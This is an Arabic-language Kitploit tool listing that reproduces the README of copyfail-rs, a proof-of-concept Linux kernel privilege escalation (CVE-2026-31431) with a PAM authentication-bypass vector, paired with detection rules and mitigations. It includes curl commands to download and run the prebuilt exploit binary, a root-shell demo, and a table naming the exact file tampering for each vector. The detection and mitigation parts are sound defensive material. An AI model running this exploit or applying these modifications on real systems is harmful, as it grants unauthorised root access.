Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
copyfail-rs — CopyFail (CVE-2026-31431): إثبات مفهوم (PoC) لتصعيد الامتيازات عبر page-cache في نواة لينكس + أداة الكشف العامة الوحيدة. ناقل جديد لتجاوز مصادقة PAM + قواعد Sigma/auditd/eBPF. | Kitploit
أدوات/GitHubGitHub/diemoeve/copyfail-rs
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلال
GitHubdiemoeve/copyfail-rs

copyfail-rs

CopyFail (CVE-2026-31431): إثبات مفهوم (PoC) لتصعيد الامتيازات عبر page-cache في نواة لينكس + أداة الكشف العامة الوحيدة. ناقل جديد لتجاوز مصادقة PAM + قواعد Sigma/auditd/eBPF.

عرض المستودع
183منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

copyfail-rs

PoC متعدد المتجهات + كشف مقترن لـ CVE-2026-31431 (CopyFail). يتضمن متجه تجاوز مصادقة PAM جديدًا لا توفره أي PoC عام آخر. وضع الكشف يلتقط ما لا يمكن لـ AIDE / Wazuh / OSSEC / Tripwire اكتشافه بنيويًا.

ملف ثنائي ثابت واحد. ~108 كيلوبايت. no_std musl.

عرض توضيحي

root@kitploit:~
noot@host:~$ ./copyfail-rs --mode exploit
[sudo] password for noot:
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@host:~#

أمر واحد. قشرة جذر. ضربة PAM القاتلة تحت الغطاء (كتابة واحدة من 4 بايت إلى /etc/pam.d/common-auth)، إسقاط PTY إلى الجذر عبر sudo مع كلمة مرور مهملة. سطر [sudo] password for noot: يظهر للحظة، sudo يعرض دائمًا هذا المطالبة؛ يغذي الثنائي أي سلسلة وفشل pam_unix يتسلسل عبر pam_deny.so المعلّق إلى pam_permit.so → الجذر.

root@kitploit:~
$ ./copyfail-rs --mode detect --scan
=== copyfail-rs detection: --scan ===

TAMPERED (1):
  /etc/pam.d/common-auth [ext4]
    cache:  23c4f1ee...  ← ما يتم تحميله فعليًا (متحور)
    disk:   117dab1c...  ← ما تراه AIDE / Wazuh / Tripwire (نظيف)

هذا هو المشروع. القرص نظيف، الكاش متحور. كل FIM عام أعمى. هذه الأداة ليست كذلك.

بدء سريع (بدون حاجة للبناء)

ملفات ثنائية ثابتة مبنية مسبقًا على إصدار v0.1.0. اختر بنيتك، نزّل، شغّل.

root@kitploit:~
# x86_64 (معظم أجهزة الكمبيوتر المحمولة + خوادم السحابة)
curl -LO https://github.com/diemoeve/copyfail-rs/releases/download/v0.1.0/copyfail-x86_64-musl
chmod +x copyfail-x86_64-musl
./copyfail-x86_64-musl --mode exploit

بنى أخرى:

البنيةالملف
ARM64 (aarch64)copyfail-aarch64-musl
ARMv7 (Raspberry Pi 3+)copyfail-armv7-musleabihf

تحقق من السلامة:

root@kitploit:~
curl -LO https://github.com/diemoeve/copyfail-rs/releases/download/v0.1.0/checksums.txt
sha256sum -c checksums.txt

ملفات ثنائية musl ثابتة، بدون تبعيات وقت تشغيل، تعمل على أي Linux.

لماذا FIM أعمى

تحور كاش الصفحات. لا كتابة VFS. لا صفحة قذرة. لا حدث inotify. إعادة الفحص الدورية تتنافس مع الإخلاء.

AIDE/Wazuh/OSSEC/Tripwire/Samhain تقرأ عبر I/O مخزّن → كاش الصفحات → تجزئ البايتات المتحورة كحقيقة. أو بعد الإخلاء، تجزئ القرص النظيف → "لم يحدث أي تغيير أبدًا."

الكشف يتطلب O_DIRECT (تخطي الكاش) + قراءة مخزّنة (الوصول إلى الكاش) + فرق التجزئة. عدم التطابق = توقيع CopyFail. هذا هو --scan.

المتجهات

اختيار تلقائي: --vector auto (افتراضي). يرتب pam > su > passwd حسب التخفي. يتراجع عند الفشل.

الكشف

--json في كل مكان لاستيعاب SIEM.

أدوات الكشف

detection/:

  • sigma/copyfail-af-alg.yml، قاعدة Sigma، ضعها في SIEM الخاص بك
  • auditd/copyfail.rules، augenrules --load
  • ebpf/copyfail-trace.bt، سطر bpftrace واحد
  • apparmor/copyfail-block.profile، قاعدة رفض AppArmor 3.0+
  • mitigation/disable-algif.sh، قائمة حظر modprobe + تحذير =y

التخفيف

root@kitploit:~
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead

أو نواة رئيسية a664bf3d603d (أبريل 2026). حتى الآن: فقط Debian Sid/Forky شحنتها. Ubuntu LTS، RHEL، SUSE، Amazon Linux، Fedora، Arch، Oracle = جميعها قابلة للاستغلال.

ملاحظة: CONFIG_CRYPTO_USER_API_AEAD=y (مدمج) يتجاوز modprobe بصمت. --check يحذر.

بعد الاستغلال + التخفيف: تحور الكاش يستمر حتى إعادة التشغيل. التخفيف يمنع الاستغلالات الجديدة، لا يتراجع عن السابقة.

البناء

root@kitploit:~
cargo build --release --target x86_64-unknown-linux-musl
الهدفالحجم
x86_64-musl108 كيلوبايت
aarch64-musl96 كيلوبايت
armv7-musleabihf86 كيلوبايت

no_std. بدون مخصص ذاكرة. بدون تبعيات وقت تشغيل. ملف ثنائي ثابت واحد.

الملفات المبنية مسبقًا ومجاميع SHA256 مرفقة بإصدارات GitHub.

الاستخدام

انظر docs/usage.md لأمثلة عملية بشاشة واحدة لكل وضع (استغلال تلقائي/قائمة/الكل، كشف فحص/مسح/خط أساس/فرق/مراقبة/مطاردة).

للنسخة السردية الأطول من هذا README (مزيد من السياق، شرح أعمق)، انظر BLOG.md.

نموذج التهديد

انظر docs/threat-model.md.

المقارنة

الترخيص والأخلاقيات

أجهزتك الخاصة فقط. بدون بوابة CLI (مسرح أمني). README + LICENSE = الإطار.

وضع الكشف للقراءة فقط. آمن على الإنتاج.

وضع الاستغلال يحور كاش صفحات النواة. ذاكرة فقط لكن عالجه كمدمر. يمنع المصادقة لأي مستدعي لاحق.

الاعتمادات

CVE-2026-31431 كشفته Theori / Xint في 2026-04-29 (كتابة، مدونة Xint). PoCs عامة سابقة:

  • theori-io/copy-fail-CVE-2026-31431 (Python، 732 بايت، متجه su)
  • tgies/copy-fail-c (C مع nolibc، متجهات su + passwd، محمول)
  • badsectorlabs/copyfail-go (ملف Go ثنائي ثابت، متجه su)

هذا المشروع (copyfail-rs): يضيف متجه تجاوز مصادقة PAM، كشف ثنائي الوضع، أدوات IR.

الترخيص

MIT.

المراجع

  • https://copy.fail/
  • إصلاح Linux: a664bf3d603d
  • الأساس: 72548b093ee3 (4.14، أغسطس 2017)
  • مشابه: Dirty Pipe (CVE-2022-0847)
تنزيل الأداة
المتجهالهدفأين يقع
pam (جديد)/etc/pam.d/common-auth (Debian/Ubuntu) أو system-auth (Fedora/RHEL/Arch)4 بايت. auth requisite pam_deny.so → #aut requisite pam_deny.so. sudo بأي كلمة مرور = الجذر.
su/usr/bin/suتحوير نص ثنائي setuid. execve → الجذر.
passwd/etc/passwdقلب UID → المستخدم يصبح جذرًا عند تسجيل الدخول التالي. يكسر SSH لهذا المستخدم.
الوضعماذا يفعل
--checkالنواة + الوحدة + CONFIG_CRYPTO_USER_API_AEAD + حالة التخفيف. الحكم: قابل للاستغلال / مخفف / آمن.
--scanفرق قراءة O_DIRECT مقابل القراءة المخزّنة على الملفات الحرجة. متفرع عبر statfs(): ext4/xfs/btrfs تستخدم O_DIRECT، overlayfs يتراجع، tmpfs يُتخطى.
--baseline / --diffلقطة لحالة نظيفة معروفة. فرق لاحقًا. دلتا الكاش فقط = بصمة CopyFail.
--watchخفي. فحص دوري. SIGTERM نظيف.
--huntمسح أسطول SSH. تجميعات JSON.
Theori Pythontgies Cbadsectorlabs Gocopyfail-rs
المتجهاتsusu + passwdsusu + passwd + PAM (جديد)
الكشفلا شيءلا شيءلا شيء--mode detect كامل
أدوات IRلا شيءلا شيءلا شيءSigma + auditd + eBPF + AppArmor
تجربة المشغل3 أوامر4 أوامر5 أوامرأمر واحد
الثنائييحتاج Python~10 كيلوبايت~5 ميجابايت~108 كيلوبايت ثابت